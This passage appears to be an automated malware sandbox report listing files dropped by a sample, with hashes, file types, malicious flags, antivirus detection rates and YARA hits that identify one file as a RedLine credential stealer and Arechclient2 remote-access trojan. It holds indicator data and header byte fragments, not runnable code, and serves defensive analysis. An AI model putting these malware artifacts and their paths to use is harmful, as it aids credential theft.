                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 59%
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.1.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4632
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.487772826240471
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:LQ5P5uBA7uREQ7z62mbLhC0PKPKPKPIQPIQPIQPEPEPEPzPzPzPwEFUuqfRO:LQ7LiREQ7z62mbLhvPKPKPKPIQPIQPI7
                                                                                                                                                                                                                                                                                      MD5:947DAAAB3E35944427EA3683353719C1
                                                                                                                                                                                                                                                                                      SHA1:D68FAC7D60B30D5FD20295485BD5163193D332DC
                                                                                                                                                                                                                                                                                      SHA-256:5F1777E8E7FF4E6D921E4E7AE44DC513E9710F8A3E27E291C7C227A91EE884BB
                                                                                                                                                                                                                                                                                      SHA-512:5FB12711D33AEF6718F88984EF447BACC0F3CCEBA7830D22AD720DFBE7F51CE6E54CF91CCD294135CCB46E690849DB1E02D80847C9A91927858C0BFA2713B1E3
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[04/23/24 09:28:20] Main : OS Version = osWin10...[04/23/24 09:28:20] CommandLineSwitchExists : Result of check = False. Param Value (if not exact match) = ...[04/23/24 09:28:21] Installer Target URL request = {"IPAddress":"192.168.2.5","Status":1,"Language":"en","OSMinorVersion":0,"OSMajorVersion":10,"ProductId":"5488CB36-BE62-4606-B07B-2EE938868BD1","Is64Bit":true,"ECommId":"11A12794-499E-4FA0-A281-A9A9AA8B2685"}...[04/23/24 09:28:22] Installer target url response = {"Url":"https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe","ProductName":"System Mechanic Standard","Result":0,"ErrorMessage":null}...[04/23/24 09:28:22] DownloadAndLaunchInstaller : Creating BITS download handler...[04/23/24 09:28:22] !&TioloBITSHandler.InitCopyMgr : CreateCOMObject(CLSID_BackgroundCopyManager1_5)..[04/23/24 09:28:26] !&TioloBITSHandler.InitCopyMgr : Copy manager initialized = True...[04/23/24 09:28:26] DownloadAndLaunchInstaller : Target folder ="C:\User
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Apr 23 06:28:17 2024, mtime=Tue Apr 23 06:28:17 2024, atime=Tue Apr 23 06:28:17 2024, length=2469936, window=hide
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):987
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.021798558909191
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:8wY2fnz8MZ6TmuAOU7mnydAnB4SaUCuzF93fm:8wdY3mKWmndXWIz3f
                                                                                                                                                                                                                                                                                      MD5:62CF6F5E7DC517A5DA0C555F7FBBC4DB
                                                                                                                                                                                                                                                                                      SHA1:B6109F890AD91FCF8B2893EFB3163F885E530583
                                                                                                                                                                                                                                                                                      SHA-256:A8A16C5239098D23D1B4E0768AC4C052008E992F533AAF516AF65CB8163DC5FC
                                                                                                                                                                                                                                                                                      SHA-512:8B705ED0911C1C09D433EE180CCAE29DE1FDE23034C22F42768D276856EBE79F68E6F8259ED677B9731CF5012904156AD2A95988900AA66652D63E3CFFE112EE
                                                                                                                                                                                                                                                                                      Malicious:false
Preview: binary shortcut (LNK) data; readable target path: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8439810553697228
Encrypted:false
SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:false
Preview:SQLite format 3......@ ...
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:dropped
Size (bytes):20480
Entropy (8bit):0.6732424250451717
Encrypted:false
SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:false
Preview:SQLite format 3......@ ...
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:dropped
Size (bytes):20480
Entropy (8bit):0.8439810553697228
Encrypted:false
SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:false
Preview:SQLite format 3......@ ...
                                                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\4BfhCycV4B.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):336384
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.453202838334342
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:jjGck+pUZ09BgybSnG+UF5XW1SNYtfvw5ZUDBLL7NVn8yjn5V4d2umdcZyH1IgSw:5k+Zt8PtgSF9VnJrPLdcZGh6hECc
                                                                                                                                                                                                                                                                                      MD5:65A31455A497CAEE44C5AA749C50E40B
                                                                                                                                                                                                                                                                                      SHA1:BE39D07704EFB35BD1503B3914C6DD6C9E6312E8
                                                                                                                                                                                                                                                                                      SHA-256:B94BD24023B0DF0089295B2246546A256D3E82424ECDB0C596B3500525AA4DE0
                                                                                                                                                                                                                                                                                      SHA-512:8FC8D9308FEDE1F2D6B118B6071CE6ED4F86A7CB2442C4C9A9686B772A83961EDA93C81C2C524396688DD1D7B2540D571811AC13CD38FBB72CCD7F6DD06220F9
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........A.lFA.lFA.lFL..FY.lFL..F9.lFL..Fm.lFH..FF.lFA.mF/.lF.y.F@.lFL..F@.lF.y.F@.lFRichA.lF................PE..L....8.e.....................f......E9............@..........................P.......g.......................................Q..P....0..................................8............................G..@............................................text............................... ..`.rdata.. k.......l..................@..@.data........`.......N..............@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\4BfhCycV4B.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4866096
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.542818068158205
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:49152:1ZRCckM8wwGbtBiRFWSGqCW4FL5wslsAEL1ksS2NHsF3TjZ1I6bqmHC0Jg:1ZRCwrb64XwWsAwFaFXxg
                                                                                                                                                                                                                                                                                      MD5:397926927BCA55BE4A77839B1C44DE6E
                                                                                                                                                                                                                                                                                      SHA1:E10F3434EF3021C399DBBA047832F02B3C898DBD
                                                                                                                                                                                                                                                                                      SHA-256:4F07E1095CC915B2D46EB149D1C3BE14F3F4B4BD2742517265947FD23BDCA5A7
                                                                                                                                                                                                                                                                                      SHA-512:CF54136B977FC8AF7E8746D78676D0D464362A8CFA2213E392487003B5034562EE802E6911760B98A847BDDD36AD664F32D849AF84D7E208D4648BD97A2FA954
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....X..................5..P......`.5.......5...@...........................J.....`.J..........@............................7..N....<...............J.0(...08.............................. 8......................7.......8......................text...h.5.......5................. ..`.itext..<=....5..>....5............. ..`.data....V....5..X....5.............@....bss.....m...@7...... 7..................idata...N....7..P... 7.............@....didata.......8......p7.............@....tls....@.....8......z7..................rdata....... 8......z7.............@..@.reloc.......08......|7.............@..B.rsrc.........<.......<.............@..@..............J.......J.............@..@........................................................
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):785920
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.809737341976147
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12288:QiMA0ejRLfxLY8flLb1MgXeXbFAsFWylkkoAbtEIwhsrU:QeDxttLeLFAsFlSjf
                                                                                                                                                                                                                                                                                      MD5:33230F52772BD46C208DFE85537F567F
                                                                                                                                                                                                                                                                                      SHA1:260AAB3C0DD5909C449B62DA56998F8ABD68A235
                                                                                                                                                                                                                                                                                      SHA-256:3F1759A3D89D7B7893BBCDEB180BAB911C960A6D1C80A04BCDA199A8284C36EA
                                                                                                                                                                                                                                                                                      SHA-512:98E3B0337ABD53BA405F76D1FCE17F9EC173C507B3DD3B89A259950AEE744FB337767BC534E817BF1DB7D5B692245DC5A3CF351BED06980DDEE2B0F19A48B10B
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\ypbquxnwo, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\ypbquxnwo, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\ypbquxnwo, Author: ditekSHen
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 59%
                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....,T............................~.... ........@.. .......................`..............................................,...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H............=..............H............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~).....UY.).... .....7...%.....~(.....[Y.)....sr...~).....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~).....SY.)......~).....RY.)....~0...%-.&~/.........su...%.0...(...+}....*.0........... ....X..{M...*..0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1640960
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.484662993855079
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
                                                                                                                                                                                                                                                                                      MD5:D1BA9412E78BFC98074C5D724A1A87D6
                                                                                                                                                                                                                                                                                      SHA1:0572F98D78FB0B366B5A086C2A74CC68B771D368
                                                                                                                                                                                                                                                                                      SHA-256:CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
                                                                                                                                                                                                                                                                                      SHA-512:8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 18%
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2469936
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.434916453080517
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:49152:Y8UMSn5cV2N9LNwtQ5gRR+moI1axGbYj6QAl4ImDkg7d5lROCDG5yzlC97W+uJUM:QMS5hN9OtQ5gRjoI8xGbYj6QAl4gg7dF
                                                                                                                                                                                                                                                                                      MD5:9FB4770CED09AAE3B437C1C6EB6D7334
                                                                                                                                                                                                                                                                                      SHA1:FE54B31B0DB8665AA5B22BED147E8295AFC88A03
                                                                                                                                                                                                                                                                                      SHA-256:A05B592A971FE5011554013BCFE9A4AAF9CFC633BDD1FE3A8197F213D557B8D3
                                                                                                                                                                                                                                                                                      SHA-512:140FEE6DAF23FE8B7E441B3B4DE83554AF804F00ECEDC421907A385AC79A63164BD9F28B4BE061C2EA2262755D85E14D3A8E7DC910547837B664D78D93667256
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20891
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.41735141652497
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:384:lhFF7DUQMnBNgCxPE/7tDEZAXMtV3STIxyd3A3lafgfdl6ii04ZQoUXXhnF6b2xD:fBMYqPE/7tDEZAK3STIxnlrn6U4ZhUXp
                                                                                                                                                                                                                                                                                      MD5:FCE67E49E191BC3FD22997050C92BA01
                                                                                                                                                                                                                                                                                      SHA1:34C08D6D404A94C2447B671A49731364EA0B47FF
                                                                                                                                                                                                                                                                                      SHA-256:F8EB44951269696615DFA62E8221C73D8EBCE0A820211956D5BF6C0A70C6DACF
                                                                                                                                                                                                                                                                                      SHA-512:4C4E1F908824DAA7F3081773CA22138C756601C6C6113E0DCF9CBC958E90A5028D9BE7E5404F19432D70B1E90D46919274188718D29F9A46B97E7ACBE8222991
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1385173
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.824453259021933
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24576:3ThHnVpIact6qMIPrpLhmwg9lUKOxrcP4912kZp/GYOQWINQvshJC6lVwymgw:DhHVfC6q7PrpLhmwDKOxrg4r2kEINQvX
                                                                                                                                                                                                                                                                                      MD5:31885BEFE89EAE873D959F47BB548157
                                                                                                                                                                                                                                                                                      SHA1:4A1D665C491D334EAE72CDD5B784F2A064A8FBBF
                                                                                                                                                                                                                                                                                      SHA-256:A06A3D6810B4B5F73A0B71487F9B32538C34F66E26F0DC1632F3D40BF0E11B71
                                                                                                                                                                                                                                                                                      SHA-512:0C1561929D19E52229E8FE3295148C8E4BC73526A59028F9FBB5BD11D2A8163CC6137232B55082AA1FC1E5F444F583064F4BC7BF282730B754BEE3C9656ED5D0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1596416
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.466475314379774
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:49152:h2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTMq+PDXx1lWz0pd:tmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
                                                                                                                                                                                                                                                                                      MD5:EA945E6BC518D0B25AAC0FCE13AE6E16
                                                                                                                                                                                                                                                                                      SHA1:4144AC69F72190F1AD163A7CC7BD38E18109122C
                                                                                                                                                                                                                                                                                      SHA-256:6D9D8727E9D8C00EB74B27C6EE3FDC90D538F30CF6A07C4B939A03FC70CE59EE
                                                                                                                                                                                                                                                                                      SHA-512:4E2F4CF61FC6364DDACA6B0BF6D917F8E136526DC1323A8BAA48166CB291285491CC2D083B65EBE30F3DC27F62B2E154A834C721140E6004596D655269239A95
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.424444254529849
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6144:/Svfpi6ceLP/9skLmb0OTcWSPHaJG8nAgeMZMMhA2fX4WABlEnNN0uhiTw:KvloTcW+EZMM6DFyv03w
                                                                                                                                                                                                                                                                                      MD5:D78FCB22F21427D6692C101CD80844C2
                                                                                                                                                                                                                                                                                      SHA1:5723BC3CB25FF9496D30F644FA14D196F726EBCD
                                                                                                                                                                                                                                                                                      SHA-256:347355EF4381E7D0E9B197452202F0D07B3C2DACE5C235336F2619E4E1C97E40
                                                                                                                                                                                                                                                                                      SHA-512:67E50061C9CE351B014B6B5F6BC4631B56FD3B6B026380B57E6DF3A589670FB817ECA1D0BAFDDD851E72CC7083CBA79ED099A938B6DC00FBB85E415F7ED2E68B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.080953506811968
                                                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                      File name:4BfhCycV4B.exe
                                                                                                                                                                                                                                                                                      File size:485'377 bytes
